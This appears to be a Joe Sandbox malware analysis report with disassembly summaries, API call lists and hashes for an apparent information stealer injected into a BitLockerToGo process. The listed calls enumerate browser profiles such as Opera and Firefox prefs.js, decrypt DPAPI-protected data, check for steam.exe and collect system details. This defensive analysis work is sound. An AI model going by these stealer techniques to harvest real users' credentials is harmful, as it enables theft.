                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: File$Find$lstrcpy$Close$CopyCreateDeleteFirstNextlstrcat$AllocAttributesFolderHandleLocalObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
                                                                                                                                                                                                                                                                                                                    • String ID: \*.*
                                                                                                                                                                                                                                                                                                                    • API String ID: 1475085387-1173974218
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 94f7ca57eddfd2dded9b005051ac156c0c8c460a762cd990eea418f5d87c42c5
                                                                                                                                                                                                                                                                                                                    • Instruction ID: e358c5a2313abefc506a1352f188218579fd9e847039496ff790cee1cc3fbdcf
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 94f7ca57eddfd2dded9b005051ac156c0c8c460a762cd990eea418f5d87c42c5
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7032A331A0016D9BCB21FB29DC46ADDB778FF45304F5105E1AA48B7262DB716F868F82
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 008F71A5
                                                                                                                                                                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 008F71BC
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,00917AC0), ref: 008F71DD
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,00917AC4), ref: 008F71F7
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?), ref: 008F7248
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?), ref: 008F725B
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,?), ref: 008F726F
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,?), ref: 008F7282
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,00917AC8), ref: 008F7294
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,?), ref: 008F72A8
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2143: lstrcpy.KERNEL32(00000000,00000000), ref: 008F2169
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,008EF752,?,?,?), ref: 008E9163
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,008EF752,?,?,?), ref: 008E917A
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,008EF752,?,?,?), ref: 008E9191
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,008EF752,?,?,?), ref: 008E91A8
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: CloseHandle.KERNEL32(?,?,?,?,?,008EF752,?,?,?), ref: 008E91D0
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F8BE6: CreateThread.KERNEL32(00000000,00000000,008F8B15,?,00000000,00000000), ref: 008F8C85
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F8BE6: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 008F8C8D
                                                                                                                                                                                                                                                                                                                    • FindNextFileA.KERNEL32(?,?), ref: 008F735E
                                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(?), ref: 008F7372
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID: lstrcat$File$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitlstrcpywsprintf
• String ID: %s\%s
• API String ID: 1150833511-4073750446
• Opcode ID: 83cd75cb27e30cf47e2d73e3ade70b17d4066bb76a9c5aa0f1bcc67b625c2cbb
• Instruction ID: b6226fe61018dd881f94ab70a41ba097334ab293473a365203b5a3587d25a2cb
• Opcode Fuzzy Hash: 83cd75cb27e30cf47e2d73e3ade70b17d4066bb76a9c5aa0f1bcc67b625c2cbb
• Instruction Fuzzy Hash: B65129B590021DABCF60DB64DC89AD9B7BCFB49311F0004E5AB08E3210EB319B96CF65
APIs
  • Part of subcall function 008F2143: lstrcpy.KERNEL32(00000000,00000000), ref: 008F2169
  • Part of subcall function 008F2223: lstrcpy.KERNEL32(00000000,?), ref: 008F2251
  • Part of subcall function 008F2223: lstrcat.KERNEL32(?,?), ref: 008F225B
  • Part of subcall function 008F2265: lstrlen.KERNEL32(?,?,?,008F8FD9,abc_,00000000,00917786,?,?,?,?,008F9D6E), ref: 008F2279
  • Part of subcall function 008F2265: lstrcpy.KERNEL32(00000000,?), ref: 008F22A1
  • Part of subcall function 008F2265: lstrcat.KERNEL32(?,00000000), ref: 008F22AC
  • Part of subcall function 008F21E9: lstrcpy.KERNEL32(00000000,?), ref: 008F2219
• FindFirstFileA.KERNEL32(?,?,\*.*,009178EE,008EDC21,?,?), ref: 008ECF0E
• StrCmpCA.SHLWAPI(?,00918638), ref: 008ECF2E
• StrCmpCA.SHLWAPI(?,0091863C), ref: 008ECF48
• StrCmpCA.SHLWAPI(?,Opera,0091790D,00917907,00917906,00917903,009178F3,009178F2,009178EF), ref: 008ECFD4
• StrCmpCA.SHLWAPI(?,Opera GX), ref: 008ECFE2
• StrCmpCA.SHLWAPI(?,Opera Crypto), ref: 008ECFF0
Strings
Memory Dump Source
• Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
Similarity
• API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
• String ID: Opera$Opera Crypto$Opera GX$\*.*
• API String ID: 2567437900-1710495004
• Opcode ID: 49f950aa73c860e4e749c805124df8f2e1bd8efcb5af29599e6204e1b83efbd0
• Instruction ID: 3607fde1fe7830855d880cfc7e6647e01c0e90de02f7928be8e72f76e8dff31e
• Opcode Fuzzy Hash: 49f950aa73c860e4e749c805124df8f2e1bd8efcb5af29599e6204e1b83efbd0
• Instruction Fuzzy Hash: EA02B73290016D9BCB60FB3ADD46ADDB774FF45304F4104E1AA08F7252DA716F9A8E82
APIs
• GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 008F6EFF
• _memset.LIBCMT ref: 008F6F22
• GetDriveTypeA.KERNEL32(?), ref: 008F6F2B
• lstrcpy.KERNEL32(?,?), ref: 008F6F4B
• lstrcpy.KERNEL32(?,?), ref: 008F6F65
  • Part of subcall function 008F6A05: wsprintfA.USER32 ref: 008F6A59
  • Part of subcall function 008F6A05: FindFirstFileA.KERNEL32(?,?), ref: 008F6A70
  • Part of subcall function 008F6A05: _memset.LIBCMT ref: 008F6A8C
  • Part of subcall function 008F6A05: _memset.LIBCMT ref: 008F6A9D
  • Part of subcall function 008F6A05: StrCmpCA.SHLWAPI(?,00917A38), ref: 008F6ABE
  • Part of subcall function 008F6A05: StrCmpCA.SHLWAPI(?,00917A3C), ref: 008F6AD8
  • Part of subcall function 008F6A05: wsprintfA.USER32 ref: 008F6AFF
  • Part of subcall function 008F6A05: StrCmpCA.SHLWAPI(?,0091766E), ref: 008F6B13
  • Part of subcall function 008F6A05: wsprintfA.USER32 ref: 008F6B3C
  • Part of subcall function 008F6A05: _memset.LIBCMT ref: 008F6B65
  • Part of subcall function 008F6A05: lstrcat.KERNEL32(?,?), ref: 008F6B7A
• lstrcpy.KERNEL32(?,00000000), ref: 008F6F85
• lstrlen.KERNEL32(?), ref: 008F6FFF
Strings
Memory Dump Source
• Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: _memset$lstrcpywsprintf$Drive$FileFindFirstLogicalStringsTypelstrcatlstrlen
                                                                                                                                                                                                                                                                                                                    • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2143: lstrcpy.KERNEL32(00000000,00000000), ref: 008F2169
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2223: lstrcpy.KERNEL32(00000000,?), ref: 008F2251
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2223: lstrcat.KERNEL32(?,?), ref: 008F225B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrlen.KERNEL32(?,?,?,008F8FD9,abc_,00000000,00917786,?,?,?,?,008F9D6E), ref: 008F2279
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcpy.KERNEL32(00000000,?), ref: 008F22A1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcat.KERNEL32(?,00000000), ref: 008F22AC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F21E9: lstrcpy.KERNEL32(00000000,?), ref: 008F2219
                                                                                                                                                                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?,00918738,0091796F,?,?,?), ref: 008EE63A
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,0091873C), ref: 008EE65B
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,00918740), ref: 008EE675
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,prefs.js,00918744,?,0091797D), ref: 008EE701
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F38A6: GetSystemTime.KERNEL32(?,00917807,?), ref: 008F38D5
                                                                                                                                                                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 008EE7DB
                                                                                                                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 008EE8A6
                                                                                                                                                                                                                                                                                                                    • FindNextFileA.KERNELBASE(?,?), ref: 008EE949
                                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(?), ref: 008EE95D
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextSystemTimelstrlen
                                                                                                                                                                                                                                                                                                                    • String ID: prefs.js
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2143: lstrcpy.KERNEL32(00000000,00000000), ref: 008F2169
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2223: lstrcpy.KERNEL32(00000000,?), ref: 008F2251
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2223: lstrcat.KERNEL32(?,?), ref: 008F225B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrlen.KERNEL32(?,?,?,008F8FD9,abc_,00000000,00917786,?,?,?,?,008F9D6E), ref: 008F2279
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcpy.KERNEL32(00000000,?), ref: 008F22A1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcat.KERNEL32(?,00000000), ref: 008F22AC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F21E9: lstrcpy.KERNEL32(00000000,?), ref: 008F2219
                                                                                                                                                                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?,009185EC,009178BB,?,?,?), ref: 008EC5A0
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,009185F0), ref: 008EC5C1
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,009185F4), ref: 008EC5DB
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,009185F8,?,009178BF), ref: 008EC668
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?), ref: 008EC6C9
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2175: lstrcpy.KERNEL32(00000000,?), ref: 008F2194
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008EBB2E: CopyFileA.KERNEL32(?,?,00000001), ref: 008EBBD3
                                                                                                                                                                                                                                                                                                                    • FindNextFileA.KERNELBASE(?,?), ref: 008EC834
                                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(?), ref: 008EC848
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: lstrcpy$FileFind$lstrcat$CloseCopyFirstNextlstrlen
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 3801961486-0
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • __EH_prolog3_catch_GS.LIBCMT ref: 008F42F8
                                                                                                                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 008F431A
                                                                                                                                                                                                                                                                                                                    • Process32First.KERNEL32(00000000,00000128), ref: 008F432A
                                                                                                                                                                                                                                                                                                                    • Process32Next.KERNEL32(00000000,00000128), ref: 008F433C
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,steam.exe), ref: 008F434E
                                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 008F4367
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                                                                                                    • String ID: steam.exe
                                                                                                                                                                                                                                                                                                                    • API String ID: 1799959500-2826358650
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 008F447E
                                                                                                                                                                                                                                                                                                                    • Process32First.KERNEL32(00000000,00000128), ref: 008F448E
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,?), ref: 008F44A7
                                                                                                                                                                                                                                                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 008F44BA
                                                                                                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 008F44C9
                                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 008F44D0
                                                                                                                                                                                                                                                                                                                    • Process32Next.KERNEL32(00000000,00000128), ref: 008F44DE
                                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 008F44E9
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 2696918072-0
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2143: lstrcpy.KERNEL32(00000000,00000000), ref: 008F2169
                                                                                                                                                                                                                                                                                                                    • GetKeyboardLayoutList.USER32(00000000,00000000,00917812,?,?), ref: 008F2A68
                                                                                                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 008F2A76
                                                                                                                                                                                                                                                                                                                    • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 008F2A84
                                                                                                                                                                                                                                                                                                                    • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 008F2AB3
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrlen.KERNEL32(?,?,?,008F8FD9,abc_,00000000,00917786,?,?,?,?,008F9D6E), ref: 008F2279
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcpy.KERNEL32(00000000,?), ref: 008F22A1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcat.KERNEL32(?,00000000), ref: 008F22AC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F21E9: lstrcpy.KERNEL32(00000000,?), ref: 008F2219
                                                                                                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 008F2B5B
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
                                                                                                                                                                                                                                                                                                                    • String ID: /
                                                                                                                                                                                                                                                                                                                    • API String ID: 507856799-4001269591
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 0e11371fab127844f98cc800f0980410101e08540c056f0d1995ae2d8c83c24e
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 5806d09b69fae181d2a50d2824554a8656f99efe2307921022a3156d82fcd213
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0e11371fab127844f98cc800f0980410101e08540c056f0d1995ae2d8c83c24e
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6E31EE7190022CABDB20AF64DC89BADB7B8FB04301F5045E5BA19F7152DA746F85CF51
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 008F33BA
                                                                                                                                                                                                                                                                                                                    • CoCreateInstance.COMBASE(00914220,00000000,00000001,0091C180,?), ref: 008F33DD
                                                                                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 008F33EA
                                                                                                                                                                                                                                                                                                                    • _wtoi64.MSVCRT ref: 008F341D
                                                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 008F3436
                                                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 008F343D
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: String$Free$AllocCreateH_prolog3_catchInstance_wtoi64
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 181426013-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: e69d07989c86203c6142c77698ec9152b1816d155e79eac4b720301bdca36dda
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 3e1c5dc1a0c80ea9b65d3315b16c0ee91c0fc0cc759c6a72fa99d873ec405e63
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e69d07989c86203c6142c77698ec9152b1816d155e79eac4b720301bdca36dda
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 80117C70E0824AEFCB01DFA4C8889EEBBB6FF99300F548468F215E7251CB714985DB65
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,008E9456), ref: 008E92C9
                                                                                                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,008E9456,?,?,008E9456,?,008EDC56,?,?,?,?,?,?), ref: 008E92DD
                                                                                                                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,008E9456,?,008EDC56,?,?,?,?,?,?), ref: 008E9302
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                                                                                                                                                                                                                                                    • String ID: DPAPI
                                                                                                                                                                                                                                                                                                                    • API String ID: 2068576380-1690256801
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 2ca4dafca64c1baab027c57b86950d34e8be0ba7704e29f4c2f19e30eecfa0ab
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 4c07473d81d4f1b997b01c1e6b765e7d73e15b618532fa02fa3514249bda49f7
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2ca4dafca64c1baab027c57b86950d34e8be0ba7704e29f4c2f19e30eecfa0ab
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8C01E8B6A01218FFCB14DFA8D9848AEBBB9FB48710B104065EA05F7300D7709E41CB90
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2143: lstrcpy.KERNEL32(00000000,00000000), ref: 008F2169
                                                                                                                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00917817,?,?), ref: 008F3130
                                                                                                                                                                                                                                                                                                                    • Process32First.KERNEL32(00000000,00000128), ref: 008F3140
                                                                                                                                                                                                                                                                                                                    • Process32Next.KERNEL32(00000000,00000128), ref: 008F319E
                                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 008F31A9
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcpy
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 907984538-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: ee8d699dffb8df52ba70e94b5a0e7d04b3546a35a6ffd22a41b3d2181e86ff1a
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 23ee148b49017eddb3f0f2eab54064901dfa00800df84b6e3e9be480bc17fd8a
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ee8d699dffb8df52ba70e94b5a0e7d04b3546a35a6ffd22a41b3d2181e86ff1a
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 73112171A1021CABD721BB79DC85BFEB7A8FB45701F000095BA05E7251DE74AF85CA52
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,00000000,0000000F,0000000F,?,008E543A,?,?,?,?), ref: 008F3AD9
                                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,00000000), ref: 008F3AE6
                                                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008F3AED
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Heap$AllocateBinaryCryptProcessString
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 869800140-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 860b051bbe447a258bb3cdeefe242c68c08210437f6e7c0929d9e3015e4f08f8
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 50af11d9b365aec20f174672b4b89dae96f77353adddf88b33fefd8905f32c35
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 860b051bbe447a258bb3cdeefe242c68c08210437f6e7c0929d9e3015e4f08f8
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1A010870100208BFEF128F61DC99DBB7BAAFF49364B244568F945D3210DB319A51EA20
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 008F29A5
                                                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008F29AC
                                                                                                                                                                                                                                                                                                                    • GetTimeZoneInformation.KERNEL32(?), ref: 008F29BB
                                                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 008F29D9
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 3317088062-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: aba6c15e6dfacbacf836926173399fbe752f97178d7e8f3cd8925c73e617a3ee
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 5a4b50127410648dc2b800f8cfa4ddf759b37d9de75df51ee04e8647078c784f
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aba6c15e6dfacbacf836926173399fbe752f97178d7e8f3cd8925c73e617a3ee
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A5F0B470A00218BBE710AB78EC09FAA7768FF04324F100255F515D31D0DF709E55C692
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,008E13A9), ref: 008F28BB
                                                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008F28C2
                                                                                                                                                                                                                                                                                                                    • GetUserNameA.ADVAPI32(00000000,008E13A9), ref: 008F28D6
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Heap$AllocateNameProcessUser
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 1296208442-0
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
